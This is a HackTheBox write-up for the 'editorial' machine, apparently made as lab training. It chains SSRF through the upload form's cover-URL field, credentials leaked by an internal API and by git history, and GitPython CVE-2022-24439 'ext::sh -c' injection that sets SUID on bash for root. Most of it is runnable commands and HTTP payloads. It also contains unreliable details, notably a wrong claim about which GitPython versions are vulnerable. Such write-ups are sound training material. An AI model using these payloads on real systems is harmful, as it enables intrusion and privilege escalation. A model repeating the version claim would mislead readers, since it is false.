HTB: editorial Writeup

#htb #writeup #linux #cve-2022-24439 #ssrf #gitpython #nmap #gobuster #burp

Machine Banner

Machine Information

AttributeDetails
Nameeditorial
OSLinux
DifficultyEasy
Points20
Release Date2024
IP Address10.129.x.x
Hostnameeditorial.htb

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

editorial is an Easy-difficulty Linux machine running Hugo 0.104.2 and a Python web application. The attack leverages SSRF vulnerability in the upload endpoint to enumerate internal services and extract credentials, followed by CVE-2022-24439 (GitPython RCE) for privilege escalation.

TL;DR: SSRF enumeration → credential extraction → SSH foothold → git history analysis → GitPython RCE → root access.

Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.x.x

Results:

22/tcp   open  ssh     OpenSSH
80/tcp   open  http    Apache httpd / Hugo

Service Enumeration

Hostname: editorial.htb

Terminal window
echo "10.129.x.x editorial.htb" >> /etc/hosts

Web Application Discovery

Browsing to http://editorial.htb reveals a publishing platform with:

  • /about — About page
  • /upload — Book/cover upload endpoint with “Cover URL” field
  • /upload-cover — Direct cover upload endpoint

Testing the /upload endpoint with the “Cover URL” field shows the application makes server-side requests, indicating SSRF vulnerability.

Internal Service Detection

  • Discovered internal service running on 127.0.0.1:8080
  • Accessible via SSRF exploitation

Identified Vulnerabilities

  • SSRF — Server-Side Request Forgery in /upload and /upload-cover endpoints
  • Credential Leakage — API endpoint exposes developer credentials
  • Git History — Repository contains production credentials in commit history
  • CVE-2022-24439 — GitPython RCE via ext:: protocol handler

Initial Foothold (User Access)

SSRF Exploitation

The /upload endpoint contains a “Cover URL” parameter that fetches remote content server-side. This allows probing of internal services.

Step 1: Confirm SSRF

Terminal window
# Start a Python web server to receive callbacks
python3 -m http.server 8000

Submit a POST request to /upload-cover with the attacker’s server address:

POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Type: application/x-www-form-urlencoded


bookurl=http://10.10.x.x:8000/test

Observe the application attempting to fetch from the attacker’s server, confirming SSRF.

Step 2: Enumerate Internal Services

Using Burp Suite, craft requests pointing to internal services:

bookurl=http://127.0.0.1:8080/

Discover the internal API endpoint:

GET /api/latest/metadata/messages/authors HTTP/1.1
Host: 127.0.0.1:8080

Step 3: Extract Credentials

The /api/latest/metadata/messages/authors endpoint leaks developer credentials:

{
  "dev": "dev080217_devAPI!@"
}

Step 4: Obtain User Flag

Terminal window
ssh dev@editorial.htb
# Password: dev080217_devAPI!@
cat ~/user.txt

User Compromise

Lateral Movement via Git History

Once logged in as dev, investigate the home directory for configuration and code repositories:

Terminal window
ls -la ~/apps/
cd ~/apps/.git

A .git repository exists containing application code. Examine the commit history for sensitive information:

Terminal window
git log --pretty=oneline
git show <commit_hash>

Credential Discovery in Git History

In the commit change(api): downgrading prod to dev, production credentials are exposed:

prod:080217_Producti0n_2023!@

Escalate to Production User

Terminal window
su - prod
# Password: 080217_Producti0n_2023!@

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation to Root

Sudo Permissions Enumeration

Terminal window
sudo -l

Output reveals:

(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

The prod user can execute a Python script as root with arbitrary arguments.

Vulnerability Analysis: GitPython RCE (CVE-2022-24439)

The clone_prod_change.py script uses GitPython to clone repositories. GitPython versions prior to 1.9.1 are vulnerable to RCE via the ext:: protocol handler in repository URLs.

Exploitation Steps

Step 1: Create Exploit Payload

The script accepts a repository URL as the first argument. Exploit the ext:: handler to execute arbitrary commands:

Terminal window
# Test code execution by creating a file
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c touch% /tmp/mrsudo"

Verify execution:

Terminal window
ls -la /tmp/mrsudo

Step 2: Escalate Privileges

Create a script to set SUID on bash:

cat > /tmp/exploit.sh << 'EOF'
#!/bin/bash
chmod u+s /bin/bash
EOF


chmod +x /tmp/exploit.sh

Execute via the vulnerable script:

Terminal window
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/exploit.sh'"

Step 3: Obtain Root Access

Terminal window
bash -p
whoami  # Should be root

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance<br/>Nmap: 22, 80"] --> B["Web Enumeration<br/>/about, /upload, /upload-cover"]
    B --> C["SSRF Discovery<br/>Cover URL Parameter"]
    C --> D["Internal Service Probe<br/>127.0.0.1:8080"]
    D --> E["Credential Extraction<br/>/api/latest/metadata/messages/authors<br/>dev:dev080217_devAPI!@"]
    E --> F["SSH Foothold<br/>dev@editorial.htb"]
    F --> G["Git Repository Access<br/>~/apps/.git"]
    G --> H["Production Credentials<br/>prod:080217_Producti0n_2023!@"]
    H --> I["Lateral Movement<br/>su prod"]
    I --> J["Sudo Enumeration<br/>python3 clone_prod_change.py"]
    J --> K["GitPython RCE<br/>CVE-2022-24439 ext:: handler"]
    K --> L["SUID Bash<br/>chmod u+s /bin/bash"]
    L --> M["Root Access<br/>bash -p"]

Tools Used

ToolPurpose
nmapPort scanning and service fingerprinting
gobusterDirectory and subdomain enumeration
Burp SuiteHTTP request interception and SSRF payload crafting
python3 http.serverWeb server for SSRF callback testing
sshSecure shell access to the target
gitRepository history enumeration and credential extraction
suUser switching for lateral movement
python3Execution of vulnerable GitPython script

Vulnerability Reference

#VulnerabilityComponentSeverityImpact
1SSRF in /upload endpointHugo Web AppHighEnumerate internal services and extract credentials
2Exposed API Credentials/api/latest/metadata/messages/authorsHighDirect access to developer account
3Credentials in Git History~/.git repositoryHighLateral movement to production user
4CVE-2022-24439GitPython RCE via ext::CriticalRemote Code Execution as root

Key Learnings

  • SSRF as a Gateway: Server-side request forgery can expose internal services and sensitive APIs. Always test user-supplied URLs for reflection to internal systems.
  • Git Repository Security: Version control systems often retain credentials and sensitive data in commit history. .git directories should never be accessible to unprivileged users.
  • Dependency Vulnerabilities: Third-party libraries like GitPython can be critical attack vectors. Keeping dependencies updated is essential for security.
  • Credential Reuse: Developers often reuse or derive passwords. Credentials discovered in one context (API) may work in another (SSH).
  • Privilege Escalation via Misconfiguration: Unsafe sudo permissions allowing execution of scripts with user-controlled arguments can lead to code execution as root.

Author

Editorial Writeup - Based on official HTB methodology

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #SSRF #GitPython #CVE-2022-24439 #PrivilegeEscalation